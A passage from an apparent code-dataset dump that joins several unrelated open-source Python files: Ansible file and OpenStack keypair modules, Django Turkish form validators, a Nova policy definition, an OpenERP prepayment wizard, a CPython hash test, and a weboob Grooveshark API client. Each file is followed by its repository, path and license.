if not b_new_line.endswith(b_linesep):
b_new_line += b_linesep
# If a regexp is specified and a match is found anywhere in the file, do
# not insert the line before or after.
if regexp is None and m:
# Insert lines
if insertafter and insertafter != 'EOF':
# Ensure there is a line separator after the found string
# at the end of the file.
if b_lines and not b_lines[-1][-1:] in (b('\n'), b('\r')):
b_lines[-1] = b_lines[-1] + b_linesep
# If the line to insert after is at the end of the file
# use the appropriate index value.
if len(b_lines) == index[1]:
if b_lines[index[1] - 1].rstrip(b('\r\n')) != b_line:
b_lines.append(b_line + b_linesep)
msg = 'line added'
changed = True
elif b_lines[index[1]].rstrip(b('\r\n')) != b_line:
b_lines.insert(index[1], b_line + b_linesep)
msg = 'line added'
changed = True
elif insertbefore:
# If the line to insert before is at the beginning of the file
# use the appropriate index value.
if index[1] == 0:
if b_lines[index[1]].rstrip(b('\r\n')) != b_line:
b_lines.insert(index[1], b_line + b_linesep)
msg = 'line replaced'
changed = True
elif b_lines[index[1] - 1].rstrip(b('\r\n')) != b_line:
b_lines.insert(index[1], b_line + b_linesep)
msg = 'line replaced'
changed = True
elif b_lines[index[0]] != b_new_line:
b_lines[index[0]] = b_new_line
msg = 'line replaced'
changed = True
elif backrefs:
# Do absolutely nothing, since it's not safe generating the line
# without the regexp matching to populate the backrefs.
pass
# Add it to the beginning of the file
elif insertbefore == 'BOF' or insertafter == 'BOF':
b_lines.insert(0, b_line + b_linesep)
msg = 'line added'
changed = True
# Add it to the end of the file if requested or
# if insertafter/insertbefore didn't match anything
# (so default behaviour is to add at the end)
elif insertafter == 'EOF' or index[1] == -1:
# If the file is not empty then ensure there's a newline before the added line
if b_lines and not b_lines[-1][-1:] in (b('\n'), b('\r')):
b_lines.append(b_linesep)
b_lines.append(b_line + b_linesep)
msg = 'line added'
changed = True
# insert matched, but not the regexp
else:
b_lines.insert(index[1], b_line + b_linesep)
msg = 'line added'
changed = True
if module._diff:
diff['after'] = to_native(b('').join(b_lines))
backupdest = ""
if changed and not module.check_mode:
if backup and os.path.exists(b_dest):
backupdest = module.backup_local(dest)
write_changes(module, b_lines, dest)
if module.check_mode and not os.path.exists(b_dest):
module.exit_json(changed=changed, msg=msg, backup=backupdest, diff=diff)
attr_diff = {}
msg, changed = check_file_attrs(module, changed, msg, attr_diff)
attr_diff['before_header'] = '%s (file attributes)' % dest
attr_diff['after_header'] = '%s (file attributes)' % dest
difflist = [diff, attr_diff]
module.exit_json(changed=changed, msg=msg, backup=backupdest, diff=difflist)
def absent(module, dest, regexp, line, backup):
b_dest = to_bytes(dest, errors='surrogate_or_strict')
if not os.path.exists(b_dest):
module.exit_json(changed=False, msg="file not present")
msg = ''
diff = {'before': '',
'after': '',
'before_header': '%s (content)' % dest,
'after_header': '%s (content)' % dest}
f = open(b_dest, 'rb')
b_lines = f.readlines()
f.close()
if module._diff:
diff['before'] = to_native(b('').join(b_lines))
if regexp is not None:
bre_c = re.compile(to_bytes(regexp, errors='surrogate_or_strict'))
found = []
b_line = to_bytes(line, errors='surrogate_or_strict')
def matcher(b_cur_line):
if regexp is not None:
match_found = bre_c.search(b_cur_line)
else:
match_found = b_line == b_cur_line.rstrip(b('\r\n'))
if match_found:
found.append(b_cur_line)
return not match_found
b_lines = [l for l in b_lines if matcher(l)]
changed = len(found) > 0
if module._diff:
diff['after'] = to_native(b('').join(b_lines))
backupdest = ""
if changed and not module.check_mode:
if backup:
backupdest = module.backup_local(dest)
write_changes(module, b_lines, dest)
if changed:
msg = "%s line(s) removed" % len(found)
attr_diff = {}
msg, changed = check_file_attrs(module, changed, msg, attr_diff)
attr_diff['before_header'] = '%s (file attributes)' % dest
attr_diff['after_header'] = '%s (file attributes)' % dest
difflist = [diff, attr_diff]
module.exit_json(changed=changed, found=len(found), msg=msg, backup=backupdest, diff=difflist)
def main():
module = AnsibleModule(
argument_spec=dict(
path=dict(type='path', required=True, aliases=['dest', 'destfile', 'name']),
state=dict(type='str', default='present', choices=['absent', 'present']),
regexp=dict(type='str'),
line=dict(type='str', aliases=['value']),
insertafter=dict(type='str'),
insertbefore=dict(type='str'),
backrefs=dict(type='bool', default=False),
create=dict(type='bool', default=False),
backup=dict(type='bool', default=False),
firstmatch=dict(default=False, type='bool'),
validate=dict(type='str'),
),
mutually_exclusive=[['insertbefore', 'insertafter']],
add_file_common_args=True,
supports_check_mode=True,
)
params = module.params
create = params['create']
backup = params['backup']
backrefs = params['backrefs']
path = params['path']
firstmatch = params['firstmatch']
b_path = to_bytes(path, errors='surrogate_or_strict')
if os.path.isdir(b_path):
module.fail_json(rc=256, msg='Path %s is a directory !' % path)
if params['state'] == 'present':
if backrefs and params['regexp'] is None:
module.fail_json(msg='regexp= is required with backrefs=true')
if params.get('line', None) is None:
module.fail_json(msg='line= is required with state=present')
# Deal with the insertafter default value manually, to avoid errors
# because of the mutually_exclusive mechanism.
ins_bef, ins_aft = params['insertbefore'], params['insertafter']
if ins_bef is None and ins_aft is None:
ins_aft = 'EOF'
line = params['line']
present(module, path, params['regexp'], line,
ins_aft, ins_bef, create, backup, backrefs, firstmatch)
else:
if params['regexp'] is None and params.get('line', None) is None:
module.fail_json(msg='one of line= or regexp= is required with state=absent')
absent(module, path, params['regexp'], params.get('line', None), backup)
if __name__ == '__main__':
main()
| gpl-3.0 |
klnprj/testapp | django/contrib/localflavor/tr/forms.py | 87 | 3518 | """
TR-specific Form helpers
"""
from __future__ import absolute_import
import re
from django.contrib.localflavor.tr.tr_provinces import PROVINCE_CHOICES
from django.core.validators import EMPTY_VALUES
from django.forms import ValidationError
from django.forms.fields import Field, RegexField, Select, CharField
from django.utils.encoding import smart_unicode
from django.utils.translation import ugettext_lazy as _
phone_digits_re = re.compile(r'^(\+90|0)? ?(([1-9]\d{2})|\([1-9]\d{2}\)) ?([2-9]\d{2} ?\d{2} ?\d{2})$')
class TRPostalCodeField(RegexField):
default_error_messages = {
'invalid': _(u'Enter a postal code in the format XXXXX.'),
}
def __init__(self, max_length=5, min_length=5, *args, **kwargs):
super(TRPostalCodeField, self).__init__(r'^\d{5}$',
max_length, min_length, *args, **kwargs)
def clean(self, value):
value = super(TRPostalCodeField, self).clean(value)
if value in EMPTY_VALUES:
return u''
if len(value) != 5:
raise ValidationError(self.error_messages['invalid'])
province_code = int(value[:2])
if province_code == 0 or province_code > 81:
raise ValidationError(self.error_messages['invalid'])
return value
class TRPhoneNumberField(CharField):
default_error_messages = {
'invalid': _(u'Phone numbers must be in 0XXX XXX XXXX format.'),
}
def clean(self, value):
super(TRPhoneNumberField, self).clean(value)
if value in EMPTY_VALUES:
return u''
value = re.sub('(\(|\)|\s+)', '', smart_unicode(value))
m = phone_digits_re.search(value)
if m:
return u'%s%s' % (m.group(2), m.group(4))
raise ValidationError(self.error_messages['invalid'])
class TRIdentificationNumberField(Field):
"""
A Turkey Identification Number number.
See: http://tr.wikipedia.org/wiki/T%C3%BCrkiye_Cumhuriyeti_Kimlik_Numaras%C4%B1
Checks the following rules to determine whether the number is valid:
* The number is 11-digits.
* First digit is not 0.
* Conforms to the following two formula:
(sum(1st, 3rd, 5th, 7th, 9th)*7 - sum(2nd,4th,6th,8th)) % 10 = 10th digit
sum(1st to 10th) % 10 = 11th digit
"""
default_error_messages = {
'invalid': _(u'Enter a valid Turkish Identification number.'),
'not_11': _(u'Turkish Identification number must be 11 digits.'),
}
def clean(self, value):
super(TRIdentificationNumberField, self).clean(value)
if value in EMPTY_VALUES:
return u''
if len(value) != 11:
raise ValidationError(self.error_messages['not_11'])
if not re.match(r'^\d{11}$', value):
raise ValidationError(self.error_messages['invalid'])
if int(value[0]) == 0:
raise ValidationError(self.error_messages['invalid'])
chksum = (sum([int(value[i]) for i in xrange(0,9,2)])*7-
sum([int(value[i]) for i in xrange(1,9,2)])) % 10
if chksum != int(value[9]) or \
(sum([int(value[i]) for i in xrange(10)]) % 10) != int(value[10]):
raise ValidationError(self.error_messages['invalid'])
return value
class TRProvinceSelect(Select):
"""
A Select widget that uses a list of provinces in Turkey as its choices.
"""
def __init__(self, attrs=None):
super(TRProvinceSelect, self).__init__(attrs, choices=PROVINCE_CHOICES)
| bsd-3-clause |
rickmendes/ansible-modules-core | cloud/openstack/_nova_keypair.py | 41 | 5486 | #!/usr/bin/python
#coding: utf-8 -*-
# (c) 2013, Benno Joy <benno@ansible.com>
# (c) 2013, John Dewey <john@dewey.ws>
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
import time
try:
from novaclient.v1_1 import client as nova_client
from novaclient import exceptions as exc
HAS_NOVACLIENT = True
except ImportError:
HAS_NOVACLIENT = False
DOCUMENTATION = '''
---
module: nova_keypair
version_added: "1.2"
author:
- "Benno Joy (@bennojoy)"
- "Michael DeHaan"
deprecated: Deprecated in 2.0. Use os_keypair instead
short_description: Add/Delete key pair from nova
description:
- Add or Remove key pair from nova .
options:
login_username:
description:
- login username to authenticate to keystone
required: true
default: admin
login_password:
description:
- Password of login user
required: true
default: 'yes'
login_tenant_name:
description:
- The tenant name of the login user
required: true
default: 'yes'
auth_url:
description:
- The keystone url for authentication
required: false
default: 'http://127.0.0.1:35357/v2.0/'
region_name:
description:
- Name of the region
required: false
default: None
state:
description:
- Indicate desired state of the resource
choices: ['present', 'absent']
default: present
name:
description:
- Name that has to be given to the key pair
required: true
default: None
public_key:
description:
- The public key that would be uploaded to nova and injected to vm's upon creation
required: false
default: None
requirements:
- "python >= 2.6"
- "python-novaclient"
'''
EXAMPLES = '''
# Creates a key pair with the running users public key
- nova_keypair: state=present login_username=admin
login_password=admin login_tenant_name=admin name=ansible_key
public_key={{ lookup('file','~/.ssh/id_rsa.pub') }}
# Creates a new key pair and the private key returned after the run.
- nova_keypair: state=present login_username=admin login_password=admin
login_tenant_name=admin name=ansible_key
'''
def main():
argument_spec = openstack_argument_spec()
argument_spec.update(dict(
name = dict(required=True),
public_key = dict(default=None),
state = dict(default='present', choices=['absent', 'present'])
))
module = AnsibleModule(argument_spec=argument_spec)
if not HAS_NOVACLIENT:
module.fail_json(msg='python-novaclient is required for this module to work')
nova = nova_client.Client(module.params['login_username'],
module.params['login_password'],
module.params['login_tenant_name'],
module.params['auth_url'],
region_name=module.params['region_name'],
service_type='compute')
try:
nova.authenticate()
except exc.Unauthorized as e:
module.fail_json(msg = "Invalid OpenStack Nova credentials.: %s" % e.message)
except exc.AuthorizationFailure as e:
module.fail_json(msg = "Unable to authorize user: %s" % e.message)
if module.params['state'] == 'present':
for key in nova.keypairs.list():
if key.name == module.params['name']:
if module.params['public_key'] and (module.params['public_key'] != key.public_key ):
module.fail_json(msg = "name {} present but key hash not the same as offered. Delete key first.".format(key['name']))
else:
module.exit_json(changed = False, result = "Key present")
try:
key = nova.keypairs.create(module.params['name'], module.params['public_key'])
except Exception as e:
module.exit_json(msg = "Error in creating the keypair: %s" % e.message)
if not module.params['public_key']:
module.exit_json(changed = True, key = key.private_key)
module.exit_json(changed = True, key = None)
if module.params['state'] == 'absent':
for key in nova.keypairs.list():
if key.name == module.params['name']:
try:
nova.keypairs.delete(module.params['name'])
except Exception as e:
module.fail_json(msg = "The keypair deletion has failed: %s" % e.message)
module.exit_json( changed = True, result = "deleted")
module.exit_json(changed = False, result = "not present")
# this is magic, see lib/ansible/module.params['common.py
from ansible.module_utils.basic import *
from ansible.module_utils.openstack import *
if __name__ == '__main__':
main()
| gpl-3.0 |
mahak/nova | nova/policies/networks.py | 2 | 2189 | # Copyright 2016 Cloudbase Solutions Srl
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_policy import policy
from nova.policies import base
POLICY_ROOT = 'os_compute_api:os-networks:%s'
BASE_POLICY_NAME = 'os_compute_api:os-networks:view'
DEPRECATED_REASON = """
Nova API policies are introducing new default roles with scope_type
capabilities. Old policies are deprecated and silently going to be ignored
in nova 23.0.0 release.
"""
DEPRECATED_POLICY = policy.DeprecatedRule(
BASE_POLICY_NAME,
base.RULE_ADMIN_OR_OWNER,
deprecated_reason=DEPRECATED_REASON,
deprecated_since='22.0.0'
)
networks_policies = [
policy.DocumentedRuleDefault(
name=POLICY_ROOT % 'list',
check_str=base.PROJECT_READER_OR_SYSTEM_READER,
description="""List networks for the project.
This API is proxy calls to the Network service. This is deprecated.""",
operations=[
{
'method': 'GET',
'path': '/os-networks'
}
],
scope_types=['system', 'project'],
deprecated_rule=DEPRECATED_POLICY),
policy.DocumentedRuleDefault(
name=POLICY_ROOT % 'show',
check_str=base.PROJECT_READER_OR_SYSTEM_READER,
description="""Show network details.
This API is proxy calls to the Network service. This is deprecated.""",
operations=[
{
'method': 'GET',
'path': '/os-networks/{network_id}'
}
],
scope_types=['system', 'project'],
deprecated_rule=DEPRECATED_POLICY),
]
def list_rules():
return networks_policies
| apache-2.0 |
Elico-Corp/openerp-7.0 | sale_prepayment/wizard/prepay_wizard.py | 1 | 3615 | # -*- coding: utf-8 -*-
# © 2016 Elico Corp (https://www.elico-corp.com)
# Licence AGPL-3.0 or Later(http://www.gnu.org/licenses/agpl.html)
from openerp.osv import orm, fields, osv
import openerp.addons.decimal_precision as dp
import time
class sale_prepayment(orm.TransientModel):
_name = 'sale.prepayment'
_columns = {
'journal_id': fields.many2one(
'account.journal',
'Journal',
required=True),
'amount': fields.float(
'Amount',
digits_compute=dp.get_precision('Account'),
required=True),
'is_prepayment': fields.boolean(
'Prepayment',
help='Check this box if you want the payment method to create a'
"prepayment payment using the prepayment account instead of direct"
'accounting moves linked to receivable account')
}
def _get_default_amount(self, cr, uid, context=None):
sale_id = False
sale_obj = self.pool.get('sale.order')
if context:
sale_id = context.get('active_id', False)
if sale_id:
sale_record = sale_obj.browse(cr, uid, sale_id, context)
return sale_record and sale_record.residual or 0.0
return 0.0
def _get_default_journal(self, cr, uid, context=None):
sale_id = False
sale_obj = self.pool.get('sale.order')
if context:
sale_id = context.get('active_id', False)
if sale_id:
sale_record = sale_obj.browse(cr, uid, sale_id, context)
payment_method = sale_record and sale_record.payment_method_id
return payment_method and payment_method.journal_id.id or False
return False
def _get_default_is_prepayment(self, cr, uid, context=None):
sale_id = False
sale_obj = self.pool.get('sale.order')
if context:
sale_id = context.get('active_id', False)
if sale_id:
sale_record = sale_obj.browse(cr, uid, sale_id, context)
payment_method = sale_record and sale_record.payment_method_id
return payment_method and payment_method.is_prepayment or False
return False
_defaults = {
'amount': _get_default_amount,
'journal_id': _get_default_journal,
'is_prepayment': _get_default_is_prepayment
}
def act_prepayment(self, cr, uid, ids, context=None):
'''do the prepayment '''
sale_obj = self.pool.get('sale.order')
sale_id = context and context.get('active_id', False)
sale = sale_obj.browse(cr, uid, sale_id, context=context)
date = time.strftime('%Y-%m-%d')
for prepay in self.browse(cr, uid, ids, context=context):
journal = prepay.journal_id
amount = prepay.amount
is_prepayment = prepay.is_prepayment
if is_prepayment is True:
if not sale.partner_id.property_account_prepayable:
raise osv.except_osv(
'Warning',
"Please set this partner's payable account!")
if amount <= 0:
raise osv.except_osv('Warning', 'The amount must be positive!')
if sale.payment_method_id:
sale.payment_method_id.is_prepayment = is_prepayment
sale.payment_method_id.journal_id = journal
sale_obj._add_payment(
cr, uid, sale, journal,
amount, date, sale and sale.name or '', context=context)
#write back the field is_prepayment
sale_obj.write(cr, uid, sale_id, {'has_prepaid': True})
| agpl-3.0 |
mancoast/CPythonPyc_test | fail/324_test_hash.py | 7 | 7046 | # test the invariant that
# iff a==b then hash(a)==hash(b)
#
# Also test that hash implementations are inherited as expected
import datetime
import os
import sys
import unittest
from test import support
from test.script_helper import assert_python_ok
from collections import Hashable
IS_64BIT = sys.maxsize > 2**32
class HashEqualityTestCase(unittest.TestCase):
def same_hash(self, *objlist):
# Hash each object given and fail if
# the hash values are not all the same.
hashed = list(map(hash, objlist))
for h in hashed[1:]:
if h != hashed[0]:
self.fail("hashed values differ: %r" % (objlist,))
def test_numeric_literals(self):
self.same_hash(1, 1, 1.0, 1.0+0.0j)
self.same_hash(0, 0.0, 0.0+0.0j)
self.same_hash(-1, -1.0, -1.0+0.0j)
self.same_hash(-2, -2.0, -2.0+0.0j)
def test_coerced_integers(self):
self.same_hash(int(1), int(1), float(1), complex(1),
int('1'), float('1.0'))
self.same_hash(int(-2**31), float(-2**31))
self.same_hash(int(1-2**31), float(1-2**31))
self.same_hash(int(2**31-1), float(2**31-1))
# for 64-bit platforms
self.same_hash(int(2**31), float(2**31))
self.same_hash(int(-2**63), float(-2**63))
self.same_hash(int(2**63), float(2**63))
def test_coerced_floats(self):
self.same_hash(int(1.23e300), float(1.23e300))
self.same_hash(float(0.5), complex(0.5, 0.0))
_default_hash = object.__hash__
class DefaultHash(object): pass
_FIXED_HASH_VALUE = 42
class FixedHash(object):
def __hash__(self):
return _FIXED_HASH_VALUE
class OnlyEquality(object):
def __eq__(self, other):
return self is other
class OnlyInequality(object):
def __ne__(self, other):
return self is not other
class InheritedHashWithEquality(FixedHash, OnlyEquality): pass
class InheritedHashWithInequality(FixedHash, OnlyInequality): pass
class NoHash(object):
__hash__ = None
class HashInheritanceTestCase(unittest.TestCase):
default_expected = [object(),
DefaultHash(),
OnlyInequality(),
]
fixed_expected = [FixedHash(),
InheritedHashWithEquality(),
InheritedHashWithInequality(),
]
error_expected = [NoHash(),
OnlyEquality(),
]
def test_default_hash(self):
for obj in self.default_expected:
self.assertEqual(hash(obj), _default_hash(obj))
def test_fixed_hash(self):
for obj in self.fixed_expected:
self.assertEqual(hash(obj), _FIXED_HASH_VALUE)
def test_error_hash(self):
for obj in self.error_expected:
self.assertRaises(TypeError, hash, obj)
def test_hashable(self):
objects = (self.default_expected +
self.fixed_expected)
for obj in objects:
self.assertIsInstance(obj, Hashable)
def test_not_hashable(self):
for obj in self.error_expected:
self.assertNotIsInstance(obj, Hashable)
# Issue #4701: Check that some builtin types are correctly hashable
class DefaultIterSeq(object):
seq = range(10)
def __len__(self):
return len(self.seq)
def __getitem__(self, index):
return self.seq[index]
class HashBuiltinsTestCase(unittest.TestCase):
hashes_to_check = [range(10),
enumerate(range(10)),
iter(DefaultIterSeq()),
iter(lambda: 0, 0),
]
def test_hashes(self):
_default_hash = object.__hash__
for obj in self.hashes_to_check:
self.assertEqual(hash(obj), _default_hash(obj))
class HashRandomizationTests(unittest.TestCase):
# Each subclass should define a field "repr_", containing the repr() of
# an object to be tested
def get_hash_command(self, repr_):
return 'print(hash(%s))' % repr_
def get_hash(self, repr_, seed=None):
env = os.environ.copy()
env['__cleanenv'] = True # signal to assert_python not to do a copy
# of os.environ on its own
if seed is not None:
env['PYTHONHASHSEED'] = str(seed)
else:
env.pop('PYTHONHASHSEED', None)
out = assert_python_ok(
'-c', self.get_hash_command(repr_),
**env)
stdout = out[1].strip()
return int(stdout)
def test_randomized_hash(self):
# two runs should return different hashes
run1 = self.get_hash(self.repr_, seed='random')
run2 = self.get_hash(self.repr_, seed='random')
self.assertNotEqual(run1, run2)
class StringlikeHashRandomizationTests(HashRandomizationTests):
def test_null_hash(self):
# PYTHONHASHSEED=0 disables the randomized hash
if IS_64BIT:
known_hash_of_obj = 1453079729188098211
else:
known_hash_of_obj = -1600925533
# Randomization is disabled by default:
self.assertEqual(self.get_hash(self.repr_), known_hash_of_obj)
# It can also be disabled by setting the seed to 0:
self.assertEqual(self.get_hash(self.repr_, seed=0), known_hash_of_obj)
def test_fixed_hash(self):
# test a fixed seed for the randomized hash
# Note that all types share the same values:
if IS_64BIT:
if sys.byteorder == 'little':
h = -4410911502303878509
else:
h = -3570150969479994130
else:
if sys.byteorder == 'little':
h = -206076799
else:
h = -1024014457
self.assertEqual(self.get_hash(self.repr_, seed=42), h)
class StrHashRandomizationTests(StringlikeHashRandomizationTests):
repr_ = repr('abc')
def test_empty_string(self):
self.assertEqual(hash(""), 0)
class BytesHashRandomizationTests(StringlikeHashRandomizationTests):
repr_ = repr(b'abc')
def test_empty_string(self):
self.assertEqual(hash(b""), 0)
class DatetimeTests(HashRandomizationTests):
def get_hash_command(self, repr_):
return 'import datetime; print(hash(%s))' % repr_
class DatetimeDateTests(DatetimeTests):
repr_ = repr(datetime.date(1066, 10, 14))
class DatetimeDatetimeTests(DatetimeTests):
repr_ = repr(datetime.datetime(1, 2, 3, 4, 5, 6, 7))
class DatetimeTimeTests(DatetimeTests):
repr_ = repr(datetime.time(0))
def test_main():
support.run_unittest(HashEqualityTestCase,
HashInheritanceTestCase,
HashBuiltinsTestCase,
StrHashRandomizationTests,
BytesHashRandomizationTests,
DatetimeDateTests,
DatetimeDatetimeTests,
DatetimeTimeTests)
if __name__ == "__main__":
test_main()
| gpl-3.0 |
blckshrk/Weboob | modules/grooveshark/browser.py | 1 | 10898 | # -*- coding: utf-8 -*-
# Copyright(C) 2013 Bezleputh
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
from weboob.tools.browser import BaseBrowser, BrowserIncorrectPassword
from weboob.tools.json import json as simplejson
from weboob.capabilities.video import BaseVideo
from weboob.capabilities import NotAvailable
from weboob.tools.capabilities.thumbnail import Thumbnail
from weboob.capabilities.collection import Collection
import hashlib
import copy
import uuid
import string
import random
import datetime
__all__ = ['GroovesharkBrowser']
class GroovesharkVideo(BaseVideo):
def __init__(self, *args, **kwargs):
BaseVideo.__init__(self, *args, **kwargs)
self.ext = u'mp3'
class APIError(Exception):
pass
class GroovesharkBrowser(BaseBrowser):
PROTOCOL = 'http'
DOMAIN = 'html5.grooveshark.com'
API_URL = 'https://html5.grooveshark.com/more.php'
#Setting the static header (country, session and uuid)
HEADER = {}
HEADER['country'] = {}
HEADER['country']['CC1'] = 0
HEADER['country']['CC2'] = 0
HEADER['country']['CC3'] = 0
HEADER['country']['CC4'] = 0
HEADER['country']['ID'] = 1
HEADER['country']['IPR'] = 1
HEADER['privacy'] = 0
HEADER['session'] = (''.join(random.choice(string.digits + string.letters[:6]) for x in range(32))).lower()
HEADER["uuid"] = str.upper(str(uuid.uuid4()))
#those values depends on a grooveshark version and may change
GROOVESHARK_CONSTANTS = ('mobileshark', '20120830', 'gooeyFlubber')
COMMUNICATION_TOKEN = None
VIDEOS_FROM_SONG_RESULTS = None
def home(self):
self.login()
self.get_communication_token()
def is_logged(self):
return self.user_id is not None and self.user_id != 0
def login(self):
if self.username and self.password:
method = 'authenticateUser'
parameters = {}
parameters['username'] = self.username
parameters['password'] = self.password
response = self.API_post(method, parameters, self.create_token(method))
self.user_id = response['result']['userID']
if not self.is_logged:
raise BrowserIncorrectPassword()
def get_all_user_playlists(self, split_path):
if self.is_logged():
method = 'userGetPlaylists'
parameters = {}
parameters['userID'] = self.user_id
response = self.API_post(method, parameters, self.create_token(method))
return self.create_collection_from_playlists_result(response['result']['Playlists'], split_path)
def search_videos(self, pattern):
method = 'getResultsFromSearch'
parameters = {}
parameters['query'] = pattern.encode(self.ENCODING)
parameters['type'] = ['Songs']
parameters['guts'] = 0
parameters['ppOverr'] = ''
response = self.API_post(method, parameters, self.create_token(method))
songs = self.create_video_from_songs_result(response['result']['result']['Songs'])
return songs
def search_albums(self, split_path):
pattern = split_path[1]
method = 'getResultsFromSearch'
parameters = {}
parameters['query'] = pattern.encode(self.ENCODING)
parameters['type'] = ['Albums']
parameters['guts'] = 0
parameters['ppOverr'] = ''
response = self.API_post(method, parameters, self.create_token(method))
return self.create_collection_from_albums_result(response['result']['result']['Albums'], split_path)
def create_video_from_songs_result(self, songs):
self.VIDEOS_FROM_SONG_RESULTS = []
for song in songs:
video = GroovesharkVideo(song['SongID'])
video.title = u'Song - %s' % song['SongName'].encode('ascii', 'replace')
video.author = u'%s' % song['ArtistName'].encode('ascii', 'replace')
video.description = u'%s - %s - %s' % (video.author, song['AlbumName'].encode('ascii', 'replace'), song['Year'].encode('ascii', 'replace'))
video.thumbnail = Thumbnail(u'http://images.gs-cdn.net/static/albums/40_' + song['CoverArtFilename'])
video.duration = datetime.timedelta(seconds=int(float(song['EstimateDuration'])))
video.rating = float(song['AvgRating'])
try:
video.date = datetime.date(year=int(song['Year']), month=1, day=1)
except ValueError:
video.date = NotAvailable
self.VIDEOS_FROM_SONG_RESULTS.append(video)
yield video
def create_video_from_album_result(self, songs):
self.VIDEOS_FROM_SONG_RESULTS = []
videos = list()
for song in songs:
video = self.create_video(song)
if video:
self.VIDEOS_FROM_SONG_RESULTS.append(video)
videos.append(video)
return videos
def create_video(self, song):
if song['EstimateDuration']:
video = GroovesharkVideo(song['SongID'])
video.title = u'Song - %s' % song['Name'].encode('ascii', 'replace')
video.author = u'%s' % song['ArtistName'].encode('ascii', 'replace')
video.description = u'%s - %s' % (video.author, song['AlbumName'].encode('ascii', 'replace'))
if song['CoverArtFilename']:
video.thumbnail = Thumbnail(u'http://images.gs-cdn.net/static/albums/40_' + song['CoverArtFilename'])
video.duration = datetime.timedelta(seconds=int(float(song['EstimateDuration'])))
video.date = NotAvailable
return video
def create_collection_from_playlists_result(self, playlists, split_path):
items = list()
for playlist in playlists:
path = copy.deepcopy(split_path)
path.append(u'%s' % playlist['PlaylistID'])
items.append(Collection(path, u'%s' % (playlist['Name'])))
return items
def get_all_songs_from_playlist(self, playlistID):
method = 'getPlaylistByID'
parameters = {}
parameters['playlistID'] = playlistID
response = self.API_post(method, parameters, self.create_token(method))
return self.create_video_from_album_result(response['result']['Songs'])
def create_collection_from_albums_result(self, albums, split_path):
items = list()
for album in albums:
path = copy.deepcopy(split_path)
path.append(u'%s' % album['AlbumID'])
items.append(Collection(path, u'%s - %s' % (album['AlbumName'], album['ArtistName'])))
return items
def get_all_songs_from_album(self, album_id):
method = 'albumGetAllSongs'
parameters = {}
parameters['prefetch'] = False
parameters['mobile'] = True
parameters['albumID'] = int(album_id)
parameters['country'] = self.HEADER['country']
response = self.API_post(method, parameters, self.create_token(method))
return self.create_video_from_album_result(response['result'])
def get_communication_token(self):
parameters = {'secretKey': hashlib.md5(self.HEADER["session"]).hexdigest()}
result = self.API_post('getCommunicationToken', parameters)
self.COMMUNICATION_TOKEN = result['result']
def create_token(self, method):
if self.COMMUNICATION_TOKEN is None:
self.get_communication_token()
rnd = (''.join(random.choice(string.hexdigits) for x in range(6)))
return rnd + hashlib.sha1('%s:%s:%s:%s' % (method, self.COMMUNICATION_TOKEN, self.GROOVESHARK_CONSTANTS[2], rnd)).hexdigest()
def get_video_from_song_id(self, song_id):
if self.VIDEOS_FROM_SONG_RESULTS:
for video in self.VIDEOS_FROM_SONG_RESULTS:
if video.id == song_id:
video.url = self.get_stream_url_from_song_id(song_id)
return video
def get_stream_url_from_song_id(self, song_id):
method = 'getStreamKeyFromSongIDEx'
parameters = {}
parameters['prefetch'] = False
parameters['mobile'] = True
parameters['songID'] = int(song_id)
parameters['country'] = self.HEADER['country']
response = self.API_post(method, parameters, self.create_token(method))
self.mark_song_downloaded_ex(response['result'])
return u'http://%s/stream.php?streamKey=%s' % (response['result']['ip'], response['result']['streamKey'])
# in order to simulate a real browser
def mark_song_downloaded_ex(self, response):
method = 'markSongDownloadedEx'
parameters = {}
parameters['streamKey'] = response['streamKey']
parameters['streamServerID'] = response['streamServerID']
parameters['songID'] = response['SongID']
response = self.API_post(method, parameters, self.create_token(method))
def check_result(self, result):
if 'fault' in result:
raise APIError('%s' % result['fault']['message'])
if not result['result']:
raise APIError('%s' % "No response found")
def API_post(self, method, parameters, token=None):
"""
Submit a POST request to the website
The JSON data is parsed and returned as a dictionary
"""
data = self.create_json_data(method, parameters, token)
req = self.create_request(method)
response = self.openurl(req, data)
return self.parse_response(response)
def create_json_data(self, method, parameters, token):
data = {}
data['header'] = self.HEADER
data['header']['client'] = self.GROOVESHARK_CONSTANTS[0]
data['header']['clientRevision'] = self.GROOVESHARK_CONSTANTS[1]
if(token is not None):
data['header']['token'] = token
data['method'] = method
data['parameters'] = parameters
return simplejson.dumps(data)
def create_request(self, method):
req = self.request_class('%s?%s' % (self.API_URL, method))
req.add_header('Content-Type', 'application/json')
return req
def parse_response(self, response):
result = simplejson.loads(response.read(), self.ENCODING)
self.check_result(result)
return result
| agpl-3.0 |
crwilcox/PyGithub | github/StatsPunchCard.py | 74 | 2341 | # -*- coding: utf-8 -*-
# ########################## Copyrights and license ############################
# #
# Copyright 2013 Vincent Jacques <vincent@vincent-jacques.net> #
# #
# This file is part of PyGithub. http://jacquev6.github.com/PyGithub/ #
# #
# PyGithub is free software: you can redistribute it and/or modify it under #
# the terms of the GNU Lesser General Public License as published by the Free #
# Software Foundation, either version 3 of the License, or (at your option) #
# any later version. #
# #
# PyGithub is distributed in the hope that it will be useful, but WITHOUT ANY #
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS #
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more #
# details. #
